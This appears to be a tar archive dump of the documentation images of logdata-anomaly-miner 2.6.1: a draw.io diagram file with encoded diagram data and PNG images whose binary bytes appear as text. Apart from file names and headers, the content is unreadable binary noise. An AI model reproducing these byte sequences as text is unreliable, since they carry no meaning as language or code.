logdata-anomaly-miner-2.6.1/docs/images/000077500000000000000000000000001437606560100201065ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/docs/images/aminer-config-color.drawio000066400000000000000000000031751437606560100251550ustar00rootroot000000000000007Zpbj5s4FMc/TR47AswlPOYy7VRqtSNlpe72zQEH3DoYGZOE/fRrB3MnQ6qNk1mpiTRjji/A739sH5+ZGVjtT58YTOOvNERkZhnhaQbWM8uyDGcufklLUVp8xyoNEcNhaTIbwwb/g5TRUNYchyjrNOSUEo7TrjGgSYIC3rFBxuix22xHSfeuKYzQwLAJIBlav+GQx6V17hiN/QXhKK7ubBqqZg+rxsqQxTCkx5YJPM/AilHKy9L+tEJEwqu4lP0+XqitH4yhhF/TgfoH5/PLD7wJ/jReo/13HtJvH0w1zAGSXL2xelpeVAjEg6eyGBQEJyFiYAaWxxhztElhICuOQnphi/meiCtTFLc0Fy3DL9vaAIOfEZPWP3IuhkHKnpWCm44os7KTqlHPhRhHp4tvbNYchQMiukecFaKJ6uDOFXrle5atro+Nkq4yxS0RraofVM4T1UM3fEVBIf4F3BaYxt3FMAE644z+RCtKKDv3BqHnb4ULguUOE9Kye76xNBeauHrOVVwdRxPWK5x4giPM0nL12OGTZH97Z6ydT0Ez3aEz2sYItdp4c2y3dsaey+0c+R1zUvf8kT1owlv28qOHd72jTPF2deG2dc99N5ij7W507m9NqAcrsLyn4ey/L1hHN9i5tQWlv3bB2gaE/lYT2Pnjwbradyt36zojYAEwDNvQA9a2Hw/WG4D9hBLEoOy4oskORzmDHNNkwFtw4G9BTaiMrTo8lQkSHCUyjBPckLAvJVUsIt2FqtjjMJS3GVWx0flGsgDX6a7PYLg+m85YdKZLlPmIt7tE0g7xQRQjWXyFLMNJVNWIG7Uq36lavV324/mjR0XgPFpF/xoVFwkkxW8dL+toj0RL99WxeoC3hXw+iBd8gUlIfot5WUzv4WJauiOJN2JfbedeAKyRSOK+J1/tCYXLse9i4S81gfWvS9Roi89M7We1e0S+faz2yOZ8X6xXHCiqbOOOoNNCJnAFC5SEqrgOCMwyHHTpVu9jzsvGKo1sjuTB7LX81nxROEj/TtJt0RtbRCsbQ0SE8Ifu8GNI1R1eKRY3rsXzDP+pu4ybXk+XjOYsQKqf1cr8Tg5Vn4mqoThkEeKDoQR1WLSapbJB9isPbRmdrLQolGM2TlST/Q9p1bFY4bbT9XJaVVtqxXIff1A1hyfVV5yicwb/fcZVjPLy5AzWfhVnqfUAyPUW72GEFv0baozGXGd6czPte0Zj1nB3+5ykOX+nirYUFHGkVq1sqzcFR7S6r1TD3OaGszzgORMT0KA78YPHshj8D9JG/bl4A8XqTbGodqCBYM7o3/i0KeYN4MsgY6MuKeMxjWgCyXNj7WFq2nyhNFV6/UCcFwoezDntqolOmP8luz9Zjrr8u1W1PqmhzxdFJceF0Kgv09sTbjqEEjDOkcoV+0wZh0w2HLrD1dHWBXHFZfOn+DIuaf6hATz/Cw==logdata-anomaly-miner-2.6.1/docs/images/aminer-config-color.png000066400000000000000000000737031437606560100244600ustar00rootroot00000000000000PNG  IHDR<tV:tEXtmxfile%3Cmxfile%20host%3D%22app.diagrams.net%22%20modified%3D%222021-02-18T11%3A43%3A02.619Z%22%20agent%3D%225.0%20(X11)%22%20etag%3D%22XN7FnLR9z8rV8TrF2oWa%22%20version%3D%2214.4.2%22%20type%3D%22device%22%3E%3Cdiagram%20id%3D%225UVBhFNdrDuveJu0V3Pm%22%20name%3D%22Page-1%22%3E7Zpbj5s4FMc%2FTR47AswlPOYy7VRqtSNlpe72zQEH3DoYGZOE%2FfRrB3MnQ6qNk1mpiTRjji%2FA739sH5%2BZGVjtT58YTOOvNERkZhnhaQbWM8uyDGcufklLUVp8xyoNEcNhaTIbwwb%2Fg5TRUNYchyjrNOSUEo7TrjGgSYIC3rFBxuix22xHSfeuKYzQwLAJIBlav%2BGQx6V17hiN%2FQXhKK7ubBqqZg%2BrxsqQxTCkx5YJPM%2FAilHKy9L%2BtEJEwqu4lP0%2BXqitH4yhhF%2FTgfoH5%2FPLD7wJ%2FjReo%2F13HtJvH0w1zAGSXL2xelpeVAjEg6eyGBQEJyFiYAaWxxhztElhICuOQnphi%2FmeiCtTFLc0Fy3DL9vaAIOfEZPWP3IuhkHKnpWCm44os7KTqlHPhRhHp4tvbNYchQMiukecFaKJ6uDOFXrle5atro%2BNkq4yxS0RraofVM4T1UM3fEVBIf4F3BaYxt3FMAE644z%2BRCtKKDv3BqHnb4ULguUOE9Kye76xNBeauHrOVVwdRxPWK5x4giPM0nL12OGTZH97Z6ydT0Ez3aEz2sYItdp4c2y3dsaey%2B0c%2BR1zUvf8kT1owlv28qOHd72jTPF2deG2dc99N5ij7W507m9NqAcrsLyn4ey%2FL1hHN9i5tQWlv3bB2gaE%2FlYT2Pnjwbradyt36zojYAEwDNvQA9a2Hw%2FWG4D9hBLEoOy4oskORzmDHNNkwFtw4G9BTaiMrTo8lQkSHCUyjBPckLAvJVUsIt2FqtjjMJS3GVWx0flGsgDX6a7PYLg%2Bm85YdKZLlPmIt7tE0g7xQRQjWXyFLMNJVNWIG7Uq36lavV324%2FmjR0XgPFpF%2FxoVFwkkxW8dL%2Btoj0RL99WxeoC3hXw%2BiBd8gUlIfot5WUzv4WJauiOJN2JfbedeAKyRSOK%2BJ1%2FtCYXLse9i4S81gfWvS9Roi89M7We1e0S%2Bfaz2yOZ8X6xXHCiqbOOOoNNCJnAFC5SEqrgOCMwyHHTpVu9jzsvGKo1sjuTB7LX81nxROEj%2FTtJt0RtbRCsbQ0SE8Ifu8GNI1R1eKRY3rsXzDP%2Bpu4ybXk%2BXjOYsQKqf1cr8Tg5Vn4mqoThkEeKDoQR1WLSapbJB9isPbRmdrLQolGM2TlST%2FQ9p1bFY4bbT9XJaVVtqxXIff1A1hyfVV5yicwb%2FfcZVjPLy5AzWfhVnqfUAyPUW72GEFv0baozGXGd6czPte0Zj1nB3%2B5ykOX%2BnirYUFHGkVq1sqzcFR7S6r1TD3OaGszzgORMT0KA78YPHshj8D9JG%2Fbl4A8XqTbGodqCBYM7o3%2Fi0KeYN4MsgY6MuKeMxjWgCyXNj7WFq2nyhNFV6%2FUCcFwoezDntqolOmP8luz9Zjrr8u1W1PqmhzxdFJceF0Kgv09sTbjqEEjDOkcoV%2B0wZh0w2HLrD1dHWBXHFZfOn%2BDIuaf6hATz%2FCw%3D%3D%3C%2Fdiagram%3E%3C%2Fmxfile%3E0^ IDATxgXg @AD Ĩ1&h4XbP,(6TlQc4GKQclػ ,6օݽ8?sogbvfVB!G&vB!% !BLB!< <B1yx!b0B!a!BC!B!&!BL<7oČ3о}{xzzVVVpuuEƍ1b ??_R \r_}Wkkkx{{˗%vA&A&ȑ#%bXJ{bly))SF0פ7+vaiiYd|2xmʕ+J9RM͛7+mիW]рI7oݽȇ<==QZ5-[Ve8N: mcbbJiWlZh!lot z«W=KWƍնc1>'22R~ǏWنǸ0 ԪUKi~'8vvvacc~˖-jonWL`ee%ķi8ay{xL ܽ{h֬\]]aii |ᇘ8q".^ֺsy>H >^3|"?s ֭u;d2ѣGE}tCy,]Tv3x2GL*zJ)7l Gdd$"##v ?^hx U lٲY&F%/wQe˖E:uPj";_deΝ;<`}? gϞiU~my[ZZ^zXbiq[ߏHL:Uhgoo/lH\Ӗ-[ѣG |rg.[,ׯ/ 4(.S[kٳȼ+UzZu*e~U}^ '''XZZ"88{ױo߾"GEE)ͧD[A֭Kʕ@˗/ v)|75kKh-)F5аaCBiz-mu~6m _-<\coo:u|Dɓn7C'sĤ|͉L&C5m6=TkZؕ*UL&٣C4xzz mj֬={ ++Khs]Ki[رC-y'v؁/^mܹ*זrJByyy8#;&L+~-}5=+''B[U"ܹsGœ9sԩSEBv4Wzm @ֺuT1D)|]ܹs';;M66lPe;C'sUŘ1cLOٸqy20(]dtжlٲE#BѴݻ'|+WgϞպ|3[}Vn.}94`xcUJĉJŃkOO4Ix$Uq6h@n֋ *SvmÇpuu+  x{aZ5O:scdNd$ZjL]">>^)n౰\.8OCǏ Ӝti̘1WIW/BuzݻTTt)]LxX#V(~Uq)~Uܾ@I,Up֚^~YځG۝K~I &;;:v=zr T|Z!رci :/mxm?;GUSU:{=.\PZnR<#F+Ν;z"%ѯZWҁ͛JsJ;𨺡B׮]ڵk1ydM4VRիJt-"K,Ӳe" = <_ŋ{WV~~iNU(~iӦe20(xmxm>W^i[(x!⭱HKKSZn xthXS?ܹ1pnߒ<𺭭Nmڴ-Z痗UVi}&OTQw!~Ez<&x(=~^^?SMq70DEE #F >\뼴QGS@${Vz&jHWL@ccN)])~ZILLTWׯbjxm/TZeǜ9sm6\p/Sx\z&m{5kVd:TQAkTѨQ#aEK!(Ad:t:/mDT?P׽{wu[){ Z{ ﱳ+2tMӧWIӧOė.]i=zS8mQlٲK#κ^3a=;w.2GL*tY/Sک-[VMI@?ca׮]JSB_~tooomM2Eh(]w}BO>DE7oT[C_~_|mȫi%x>C xqJAz…j&%%)@%ѯR <ΝSET"*(eHcǎM <f*~.ʁ'((H4e-X@|ѤI  w> |ذaΜ9Ox3nܸ8Cʕ+N@ݳ!{~NW>.U|p 2W~(==SNUQnC)y pQիWyf.wiVZ> gϞ{5._?2ٛDUEIWWW]:_SXXX`ĉEcǔ~zJ`~b {y0=33VYu"S|prvZ3G_ƚ5k)~mQ|Z/_OϞ=.[oi)faa 3/_ѣGp}TΏGL.Uaa jVVVضmy+E=н{w_-PdPZh=znݺ~+ ʕ+{j*duY_Cׯ;wʾ|tL'm肪 */23˕+-[W^#sgeeÇ+;`РAJTz~)zUC4 trrBUkw."&x7*v!11Q|cccUWrs.T퍄u6Lo鲾_k׮Up1J טvvv7oإBQ1g`ƌbB$سgT~AR!Ĩ;w.V{]  <ҥ :uꄔ! )) 9ugϞ]Y|9*W]v] !$۷oGJzjK1Y bI#"={D``eBY0b|bar >>>oMVbu2ŋ쌭[] !6mB*UpeK1Ν;>>> <ի'O] !%)))[.֮]+v)&)„ 0}t `ڴi  (ѿnN!cΜ98pe5 OS&3eΜ9 cdddN2!H -vD Ƽy.B̚5 aaab! xLW^|bA!DXXXb!: <&ȴi.vB$ɓ1sLlٲ B! ''VVVb!: <&?P "!''xLƍ#!!A2!HSNYfb!* <&Dbb"ԩ#vB$H͚5qu "44g B!dƌ2eeŋQ^}Z2!H'NEb! <&@vv6*T vBիWbQ0111رeB1>S۷O2J ((bA!;w.&N(v ЧO;wN2! ׯeŋ?֪N\xqׇG B!F@ZZ.`NNNZ}۰S.˲mׇG >k^rJa2dR3q ªU~*'\\\ѣ<\|X8VnGU"tѽ{wօG K.ň#ׯGll;Rw^lܸ0dXB×BÆ E; 6@,^ׯΝ;Eߡ(J۷#:: ,q>]vlٲeb׮]z +VR˅oLFjժUQFo 2A&}ENK;*)% 0tPr4ig}Sy&d2xd2n޼)J- } \}iѢ.\͛7兔r/Y&еkWܹsGXرc1tPl~!1{l;wĀl2o&կ_...Qvm\~Dͅ9"]x=]6m...&M}N< \j fBNPF ޽[DS+WT 50P}]6bbb4ٹs'j׮k׮!)) ~~~2e 7Dձ{nܽ{ΈGzz:ƍ???ov܉ϟcڵ_>޽AXnrՁӧ{|y8::HKKW_ ˯R nݺ\}bϰm6r!𤦦 [nEzz:F LSQ\ρbx)/X[[ 5()<^:.] ^ժUϑ+++!\M6}3ԩS}5mڴQZ'|h$$$^z[S <u2eʠo߾9s&N8Y^ZZ믱m6G‹;d27gmVZ%L{^ \t\gׯzffpp\oׯ#˗+5k;aڽ{`ii"xv܉f͚ ?~tGM6)ԭ[ .Dzz:r94Ǐf͚EСCHHHP 8 ۷ѽ{wkrPR%>}:t(urϣG₝;w"33(S _3gΠB z*={舃"==k׮N8Mٵk6}9rJdeeaݺupwwGjj*5x_ 4æM'vIJb֬YW1𨁁[W_ ֭_^zA.#++ SLѿB./xƌ#\uVԮ]åK  ǎCZΝ;cŊS\9#TT ~!?\^$;wÇ},QԘτ РA8p@RthРeQ%cJJpE.suQj(1۷ʕo&v)zuVXZZСCj0𨁁Ғٳgdž `|עE4d 77WRފ/_" /V9G Kď?(v%œ9saQR}4O>D2J6mȑ# o50PJ)G_SNRaҤIشi0PJ)G.]`bQ*ܹ]vJ)(SJ]Fjժ`Q R}zR`}xC)Txd2ٜy!d7QG \RJ8tPBJhoĉWJ"E:u d2>{QJ){#G:K0d`)t#;;ׯG͚51l0$&&jl qFl߾]iP?s?"|$D)LL9;)~ijJDž[lQ:~H]z*L+++=[n˗/K:`9r$*TS:G "::111sh.đ)57?/(?G(ZWZQسg6oެ!Eoٳ',--ѻwoL6 GAZZZ Tȑ#6mXYYW^رcG ==&;"ƍRJ;vu)>|jժ! XhpI\z |HMMիWq a… D@@<==^z!<<G1JWD`z Ԧ;R j늳UVCwbXx1FQFyA`kk KKKvvv-Z 00cƌŋ{>-d2?…ߙ(JދL ;R}'\34 WIZr2piEE̫,63j9 kf+{EDx(1OpiEEѷUIzi5rxC)T!$nhy*JڕCm0PJ)Ge!v* =Ѧ>Fx(ҡXQTlkNڽ"" 2%וo;RJx0 jK7 쪊J0\Zd2F7¢NwR黸n2Z`[ѷWi8SxG#2 y/r;RJ"^K>4[8JÕxk+"R0`sSpvq-J)E+XُRů {GzJQh]gx48`_>s|VbRꆩN \2n<~HL+MC-gѷaI:3lj.{EDT ؤpyU\{G:K;J)fޑ8<WU@҉ :?L&C^N*. z()I/D m\CX:m,քu7E&RJĵ#bMXw>caہ:?DA}ٸ ?63=k; KPZ_i(ؔgrLq3)o7bFT e<~Hrpmp(VrL*Fwz]UtwcR]\y/3{ED 6PZ ށ t*R9svyfC/n܍˫!qh<}=ygvL&CFV'D)TEGVK < d2> >}'R*}'V|PW_,?S?Hy&׸iD߁(S½f#a)x.|%y14";NF`HϋON⭧*חG VEy(Am} aQ <9!Hmg=aՈs2OZ_ΣRj<{oF,#f۬$w*vOi}x0|N,BkRJu7ı:+!L#2 O\Ôot7q <E)؇0XUŘxѷSi8zA& IDATG- J= Z]b^ZAAk0𨅁RJ>J=ku/uj+G`QR}4S x\/3 BJ˽;x5;z+_.o0𨁁ϣWsL(&P7޾xfz" >W Bm0ν8lR]cE$ڸ^Yjrs1$,A}G <ԔxSӰmWLz ׯ[ϲ623 |;zR;u' WEuF~^59x C<xJjJj <Gm_""q)(P7]NMC0קRgˠ2h$Bm܄2=?_/}(5xL&3@Dq~n<PP`Qw}.Zv~juQjHM%d2ѷ!G <kآ1ݽ.; `1J$dwOc۲I^i;k2HK-0PJ)GS<JECx(꣩J)c  zvG7)v juy{l4 mO-wCx(꣹udOJ?'5Fc~.`QR}4s/a9 6KGޫWem:?xC)T9݉uwV_6?xC)T9{lO0x0𨁁RJ>s'!ޢ8RJ>{؇0 ZӺxR-cf?5X Z G-ߌX`!8|)@Y/:g'&y3QJ)DȜȐT:~HƟľSԮP7OZO~^cu6C}){EDlL܃஁TCRJTnc03*OPy"EǜÔ5a{S࢏>FLTۼ7gpeA^95?0X EWڽ""C16gIa I)A1)" #16vCJi `B<2 AGJ G`RN*Wڽ""l03fbg!pT>mRj&>"lo"bF o:?qR28{{ Lޖ]Nl+^$3NǠߺ~[WQJ)5s.<8ϲ<~H]z 03.~[WsQJ)+/iJܼW8yc?~9č!0c?'oCN3/iwqQ{?zohXW_ޛާ`Uw%}5Sp)D0$-oib.,. ")b." "2&$az^9G|ϻY,pz,b Y%j;Tp:J}4JOX~ϣFsyB~naqW}ehaښ1ePJ)majsOa:)! ܬXO++0wz ; z>iZnٛ'qZ]Yv]31f[`aG+ J)b{4&&xNNg 'Ed|=^p kG6@J; yK#q ye%(*'6x&'$=(mO;rx]7v&JŮG jMPJ\0WŷW/\mcMtJOx!8#U(Bԝ X}{q}d?i;gM3/OOBQe*+Ffߔu'"MdpN ,G@zJԘ#bcHw0?R |PF9.D!A>JO8E"]]01w /!6r4(Rap: BL 8#yy!GOxTYۚ=ep<s/M j2x Cu2x5VWF"Y%j|r6 e]>x>9i.GxQ =0x1j쒢F{XOϝ餭Vecaښ1B;R]_7LLSNl=4XZWURJ)JO+Œ|uM? I]:37\EYuyK-} >v_"6f=*/l _/7 ;>WrJ)W#h۬󇜨 pmL +[4WsC$vg+U~aCb~^8e\玧RAt2^ӡܲAΕ:ȉ';|{,9ɠ45쳤WER}e 4_%QO2 <Ԫر t2F+U'!*Ks;血@);n֓<ȑ_w.=΁XqsL 7 Y%ju*tf+?i);/GeMB &l@g8 &Wޫ"!7Puy!\(RJ<IC Q]jp+M _ᔟ g!lA@RȬse:kzjqh?y/ɺҬB,D-x\B ="\D)T0J.xrnz{ Ly DP@'Fji{?ޭm;l}5ÌU34w7y^ 7N՟J~'R*>F<)_aӂMͬ{jGOFuϿLlL gf׍Wޫ"!#<7.D)x<|J} I}$_XOz,baNznu@^=@iqYaӐ2xhwJ)ǖp^1\SNA+>rl"&x >|1& GJZ<&[AN?G?~9k&RJh7n];Zc<Jܮ+xLٖj4;wJti*RJ8)..)L'ŎeڟʪWL{e?#7ڮ+xr0 T̟2G+I!$PJ)5>BfI} 6bKcY5af?n`D/\<3^[JͶ%Ze9d |<G+ J)b{y. I}]=×i:xFҭxXP$^L6Z?gޓ0xࡔR*F!!Gl,xe%5{XZdܼGj 1zr RJ<= A_<έ\5i`hC)T :>?|ꅴ˚ v5ԣ< =0x(r 4YlGy(xfi!ҮgDPH||v 39KsJ)uz =0x]Q`PYi vC`S)-*(-.Ûi(*,ƛE_j1xt W4D~g0Ommm?̆I'u6'3PW.x >c+v=3GO ͶaOS.3_kq74~2x,dNO;rPkx/&vp {a"(> v=f= >Qd<Y; W31 '=1S3ӆZ#zf=f5cߝXL_([=j ]n ^\>|FOd3 *W#/;yYF3u.(_cxWsZ?\?x޶?xfŪ8~ܦDot1<&`ߦF3,*TWU QόCa -?ΦrǏ}F&RJyZd衣BPJ)5 yCGRj< A)02x%GRJadK:/R =t_J)#/ 333 bDԿS 2'4?C9z˺sf5t [=7gnJ ++ i!556l@=j*(JTUUI2Kee%9+VW^ذaZt =`…RA!DX[[?c̙޽;䄨(6ٟZFTTG={6D_' 8RA!Dddd`РARn9s7nʕ+c"66PT(--<2TUUT*ܹs ۱rJaӧfϞ7"** s3x~ WWW "C6n'''ǐ,,Booơ7O1H+aݓz B!$'' z b<")) cB1 ͛7ٷoBX~=8 @0x kB~W Xh+BD F?AAARA!`RAObii#GH=!f &H=i#i jaڵF>}Я_?=666غu+x 77%%%RNy)))Ann.RRRHa֭Xd F~o߾?>GI=:yJ`<#::Xz5>bذa:t(޽{CP@J)5 {F1tP 6 իgDGG#??_2STUD,'IENDB`logdata-anomaly-miner-2.6.1/docs/images/analysis-pipeline.png000066400000000000000000010711321437606560100242470ustar00rootroot00000000000000        +G" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?S((((((((((((((((((((((((((((((((((((((((((4|O5~16Z]K,?,Q4.%VjWoDvW9v'x'Fq'8UYQpA #o?>P?Wފ+_G/Cw(EKƟP>WgE/ #o?H[O(nZ`T+3`R}[x^% ūs]$lee1㌊O<,,wj^nufl`3%eQԱ|u+?.f_uY02R\cMhy۴WƩjz6_-%#1,MCe]鲉-.B4E|+obYiYåfGr'ٲ>kI]YN:huGw @tQ_f/⧊-,UZC}"EȈC`a@|Q_"~~8~$Vjɤ"{{$Ȯ&s_]E~j^ ]|qC?i?@tW-O?㏏vL?+߅= oon/{Z?y#W5e7[J̋$RەԌ &(ojz$ [N"*62>- ' >&H~%|A;hTIE~j_5IO/|M*?HY?i7 n?ksԵ _ׇ[>Oy#I+bP73Ng4QEQEQEQEQEQ_|Sb,uq۔(08U`I&>ڢ/ޱWSMnZK 9%$5柶/5 hFen^*g(ck>'+o[wJ̣>L K'>|!lż:vKT3䜑k QTZzFyD:S8ԆA`_C]'H:J0'9p~vyo_'>X],/m^}~xgO4KHAh 3KWb1xjV<C/u"IC?:kiT G'/Ci+쏇?wc~֯x_Sׯ5;uu{dEUm Ԛj׊_1,52FeK6.!r  A+? |IJ LdZ$Zzur}ύ?i|HinZ?,R=I{k$Eѡ _?ATs|%x3How]h!'¨Cc*?^mtf fi:0r[7h/KR?4]ZaXu z"oBDSfГ3~57RTJSC2)acݱYK'5 yUinDkNAhBO_uK!'EjG_kW?OMW+jp>_-5F٬2Fۑ:cx}}g LJ?뭯7аXcZIeP"[izt~?Kr8>}}E~V[i"ۍQt븥bW+<kǽ~Q_#}rNԚLcܤt+_\V [] ߪ_타@>j.r _|ߵo s[脠g"ckg"ch@jn=>|lԾ;ZӴH5MNtay -T {1V_)Rf]>PIu3 = 1Ё:M?qI. @=)""5ii+$ q rT<ďZ(C[|)t2(G<{9vz4rIz1g;RVxbT 췇qȍNWu?gPùTm>%{ll[ E|3?5Ӣ?Q<'mui6}wm!GN ƬC7S`c췥xZx[N6`bQoB `9p9(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((~MBuKc1@mT7dcEaNΪWRVzE-'/x:O Ƨ]Ggm) Oa]?ן>,7Ehd90[ ~*NOzŽGwfj+ WI!J py;ܲM^voD~|-})wjfc`2Y $?O%xG={ J)l~4OzwȟI7gɆ2Lctԭ|]cck&׽iRH3;~Ж%I>_&u/f}vk*Ps54WG3wO% z ou_s_&J{_:j[y8k5]Lz_{ LMKxPIi=5_^'ss9%G'S]\H]bq+e&jcp˜&y ϚG֗T3clKS0_$*3袊(_|(m0kr#6щ6K txg`tX\J JI|1OX<]a ?~'O,.΀=)_}_?U5_௵򦾳K_&Wxx)h:(>SC)^`~'WSS} }7qjb]sšw>6u+KD@b( ( ^ }j۬Oȕ趠U<a/W_ x7V_=+ jpUrH琨ڪXn2Z|!t6:lɜg]~D˪|W5E.0=+L}=IbQLc݉k/ 2o@?Ķ2 NZX%4uڂF0%%ǩ}}c^[Nq?ľbذ:9R'{؟5 j pIЖCϭuO&<a[;G&; N3 `_Ś?>?,{%S%·۟u|aȋ|`2!PWƞ&׵XRG)A ;d# qVد?7*jn{P״iZfkU ##y · ~#\3uir;I?:+_6F0L2IS >xP|5|UVp?땷J_Lۖӎcc_4~տ\5m>Sjۋ@USjۋ@8xZ\z2 6vG\k*&>7!}&z_CP%C֟;7=I2aA6>V=}FE|w_ %z&#iu];%Sb~ڿHc mWơj$(3+յ8t]*P$[BTdU,q ۖ]SMf_)veQ} RoT}C#d㗅7y[yO@?}i3gi0,V78it{#袀>NZX%4uڂF0%%ǩ}Yo<[^j7} d?\׫~Ӷ|/,Tcfx3* -.0(bIxE7R2>¿,8感Uߋ|cVצK;7pH@oڢ3̺s0-27[=Pwwcw1m$%̆Qn1r}pp ý}*{A~_h ߨN &\(9*?h>,6ocg(`;RNI=5EQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEWS < ROdo}ΖT'WXE,@I+>8ı$bґ2B;n;#sW,-oI{?**Nkm+ _wTX\B[˥؀8 2&o#.Hk;BM.Qs&܎_F ѡj?(?b_]-yO iޙT/u ĚM:|ž+ξoOZTyY_cxt*'GC>[G8_5z_gň"H(E @8F{3y5[o?ziTi G/Cw+Q|_~WU`t>K]J(UM~\<2xƿ/^[M=^F Gr2;WtӚewk~cx7f_Lc݌ e z?%՝@Ȑglq?h/WM16# sr>׼?xcTNլvZIwZ7}7s FTZ4 s::} w Î.;zk^\ @{_?x:OX<]a ?z/S%SU,> Z)jG_kPM}g LJ?뭯L} eѵGIY2!c8ݴ'Ex[KQӬӸQМRpp'_[>84Py׷q+HGI?C?FGZG ,+dKƺًRΗ1SM%3P,}K=5ok0iZ-,qyEQܞ}C%?U"kPHR{QEQEV'?J?[VbxD>E~w& YҺM%S_tW7+Do=&M4Z|ċ6_WIE~pxKdžu)؊Yp 1?@GGï\jvp3xwRDRVc0rW{^g{MƋ2=QjС2  @>KOޢ}Z+tB~mF#Wگ֓` uU*P~6J~ϧfBNqx1}G4;Tn7U:# k FI$8H**, ~ޤ=S G]V=]/1|R]bȞf.vc@Cx; k: oW?1I)>jR7+o|RԬsgpYS?27AW><X$^p}A\j~!ɩ2iGb7:>׳|Pk-6MGQYhpÑ v+>*~2xGMjIWnp>4'ۢWQK,=d`Fu?_[%\V!+;;HtH-mXmE8ע}?j.r @YE|)^F5yW  תE|)^F5yW  'Ĭ/#ԇMGǭ}7_ i|,,|SBդ{YErF"}@doc>>rOyK\K[y8dV 3 -gXKU$lW憵s?wۡ{kSv4RNeu 1^n?|$&K RP64#^HN `wI=qkxSǥؓOc|{>M)}.[{xKN!~g/,xgRA 1݈kz ~\:uƧg7u)Zh$E%`v9h%}G4O4_,ʱEB@03r3su4mik v]UGhwXoW~1[mV1z?Dk~weP=W W↳mbS}?L2 zp>gcs}}:|%W/ԙg r#!#Ƕ(ի_)oE-${8'e/!bc#{z;fD'bt-J瑓Nxhڟ4093RU |.hL݆7E}3= `(AEQW?gBL.P$Ɵiȴè~OZF=;c?;wu^jQ[njw6C ! CNk (TU15s gb)kh  xk}H#oa_soP^+7>1&:Ww41Ԛ(>KjEss=Z2^ BĀPwPAh)?|AAj?]ETuvU?4P7<x.zm[[x.GBՏ=I5EQEQEU]WNX,&gXnx 0VR85j~~ֿj%ΟuI4gD2pE{PEPMWJ4 B+)dNǡ5{E/4 Qq ?55կ3ns)%Ŧ?{Ï>b}.Ů5,`$o/ *((-5<5.دϗYK)H͌F4-+[Jk,rD܌p`y=Aynݻ+'+͒zn(~.Z Iz+Kx$$qơU ;TPU5]*\Ӯ,5 Xl]:GE|ؿϢꗚrImPn|e$XЇ2h=q'? XOصƥB{^E?f|K$޳s"X$:Mu  49tM"M)[VF72_E i9eMz٢¼#ρ:7Q=s%e㓁~R|uap=wujU=s-9vY{ o\Yi56(26Su>?5%u͜_J"omѰ1zߛs=C;3p3RAh.# KQ߳Q KQ߳WKϹ_܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ1gRCQfod˩C N vr^OYЏ}o*Dt溈e? }i"l/raU:9ъ:U kD6+UtoigݍWv}a`*_߄ڦHWT3f_5x/m-'Ы#<+#Qh~qXv{5z QZ8QEx>ȳ)%anGvAxnʭXPQ+1 w-4>yrhV1۠8>~M_"of=;?KgM '_4.?s4Q?_{:oY>"oO)qkg.?|EAK\{8vlΛO)qh/ \hðkct|EAKG,R73E[?/ \?dƹ(p/7,R7 '_5G`}dƏY>"of=;?KgM '_4.?s4Q?_{:oY>"oO)qkg.?|EAK\{8vlΛO)qh/ \hðkct|EAKG,R73E[?/ \?dƹ(p/7,R7 '_5G`}dƏY>"of=;?KgM '_4.?s4Q?_{:oY>"oO)qkg.?|EAK\{8vlΛO)qh/ \hðkct|EAKG,R73E[?/ \?dƹ(p/7,R7 '_5G`}dƏY>"of=;?KgM '_4.?s4Q?_{:oY>"oO)qkg.?|EAK\{8vlΛO)qh/ \hðkct|EAKG,R73E[?|D?hX|fvo\In\E;0/o ~$R0q`׻ǍqI7]`yw d A$NcqMc,<_á`IJk|`r2:R_h˯ :NZMU/1eꖺ֟si:TG\2?Ic(i*%uy2QRva/l ޱ}x%Phw?߆.;_#a;F1Bܒ5B~վ0^Iw}qe-ỊW2{pI.] 44]Tx6{ Gy+`&|/J;?To2t蛀&>yC:+ߧЂ]0Tae~bsn'EZ_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^_o*o*zPE*>A?A?(_p}^+('V]VB?z^>&E (r2і?j> I:x,uFɀ"yR{bC}gkwRLٿ#B:y撾?n/-/5m2e>d'9F0|ky.jO~^ycw~7xbVЮ☼a8pL36vgZ0)+hg]W3^D1Q6w>קj_]?mmK#z2kys}tղQD {Ugs2fXKh[6ywů:\j˱ٜIEWۓ?pF j%hQE((((((((((((+/|b'Xm3U׬,nW(^nG"D8+|* (=@(((({v}־xfPۡ@xݎÃ؏)d|F*W?~>Q>,>ZFxʱ$d0e#Aڿ$?,q5 {*ǀ2 рzzW-^J.u9Zvu9ʁ=sڽsS,LKU}O//4cXɍZ>aCǦ /e.^ysg_a >׭F*ݟi,ewB܃W/!EWIAEPEPEPEPEPEPEPEPEPEPEPE z@ E}?ه6SYэ!Ι\v5m*B{]&&F#OĞU? #Z2*>xj]&O+sŠ((( sWk.E"qwY)?HzG;GpU'7Οo (>p((P߇8|]> P4qyQ;Gt,GRz<{ Ri 